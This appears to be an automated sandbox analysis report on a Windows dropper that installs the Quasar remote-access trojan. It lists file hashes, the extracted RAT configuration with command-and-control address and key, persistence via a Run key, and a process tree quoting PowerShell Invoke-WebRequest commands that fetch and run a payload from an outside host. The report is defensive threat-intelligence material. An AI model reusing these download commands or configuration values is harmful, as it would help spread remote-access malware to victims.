Analysis
-
max time kernel
149s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
30-07-2024 02:36
Static task
static1
Behavioral task
behavioral1
Sample
jdconstructnOrderfdp..exe
Resource
win7-20240705-en
General
-
Target
jdconstructnOrderfdp..exe
-
Size
288KB
-
MD5
7e900eb50f9dc1cb5c68ffea4b9e7bcc
-
SHA1
4dcc14dc2b98fbc171308fb55b5b8551dd96ea96
-
SHA256
8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
-
SHA512
a77aeffc4f80358940e40789a67f67df5adc1bde4790a400665a98871498b10c3206981d3f18efa1149c9ec246f0343d133dd77de4f5a1f5816506a204276b1a
-
SSDEEP
3072:6q6+ouCpk2mpcWJ0r+QNTBfRuk1qXkXRA4XTZK:6ldk1cWQRNTBpd8t
Malware Config
Extracted
quasar
1.4.1
Office04
192.228.105.2:4782
4ea5c3e6-40ed-401e-8a68-e96daa2a46a9
-
encryption_key
0FE4B3C613E3E61C318BA9D568DC6A8C56D2E505
-
install_name
jorder.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svchost
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/488-42-0x00000000055B0000-0x00000000058D5000-memory.dmp family_quasar behavioral2/memory/488-43-0x0000000006030000-0x0000000006354000-memory.dmp family_quasar -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 26 2828 powershell.exe 29 3956 powershell.exe -
Processes:
powershell.exepowershell.exepid process 2828 powershell.exe 3956 powershell.exe -
Downloads MZ/PE file
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe net_reactor behavioral2/memory/488-35-0x0000000000210000-0x000000000027E000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
jdconstructnOrderfdp..exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation jdconstructnOrderfdp..exe -
Executes dropped EXE 1 IoCs
Processes:
networkrunfdp.exepid process 488 networkrunfdp.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
networkrunfdp.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkRun.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\networkrunfdp.exe" networkrunfdp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
jdconstructnOrderfdp..exenetworkrunfdp.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jdconstructnOrderfdp..exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language networkrunfdp.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 2828 powershell.exe 2828 powershell.exe 3956 powershell.exe 3956 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exenetworkrunfdp.exedescription pid process Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 3956 powershell.exe Token: SeDebugPrivilege 488 networkrunfdp.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
networkrunfdp.exepid process 488 networkrunfdp.exe 488 networkrunfdp.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
networkrunfdp.exepid process 488 networkrunfdp.exe 488 networkrunfdp.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
jdconstructnOrderfdp..execmd.exedescription pid process target process PID 1520 wrote to memory of 1484 1520 jdconstructnOrderfdp..exe cmd.exe PID 1520 wrote to memory of 1484 1520 jdconstructnOrderfdp..exe cmd.exe PID 1484 wrote to memory of 2828 1484 cmd.exe powershell.exe PID 1484 wrote to memory of 2828 1484 cmd.exe powershell.exe PID 1484 wrote to memory of 3956 1484 cmd.exe powershell.exe PID 1484 wrote to memory of 3956 1484 cmd.exe powershell.exe PID 1484 wrote to memory of 488 1484 cmd.exe networkrunfdp.exe PID 1484 wrote to memory of 488 1484 cmd.exe networkrunfdp.exe PID 1484 wrote to memory of 488 1484 cmd.exe networkrunfdp.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8D3C.tmp\8D3D.tmp\8D3E.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3956 -
C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exenetworkrunfdp.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:488
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD598ca3263bd17f6f4308b8e4ff7530958
SHA16f41bacd42af6a11bb8d1516f7b07171087e7a17
SHA256d25dfa289ae0981cb5c6da04de6c9f1a4aaf51ba8eafb7aeda3c9e5a27268e19
SHA512f2ad36f84956741c2e3ef494a36f2a96bf944ab035419e82447bb25a53b309a9e93b450d679cb5709f6acb5a2b7956c568b280151b65313637f758ffd08f01e7
-
Filesize
334B
MD59aaac0122442ca0ebb4d8bb795e86676
SHA1594744d8e4d51273dd435c3fac5799bc5f180e8c
SHA2566af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
SHA512d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
417KB
MD5a18b7de2990becc30f700720e19ebfef
SHA1b48c1a5c7756bccfe05d7999daeb96e7ab688cfd
SHA2562bf98c947ce0bd8e6e6a0c0493af056790d61ab86c7c47896b4688bdc60b68b5
SHA512484f8faf3973b74c96b6fea157774c627044fa4631e127de30f9f93468d38e73befa3c3bff3ea07108c82d943c9b56e79c5d6391d0e3a9b197869b0715d2808b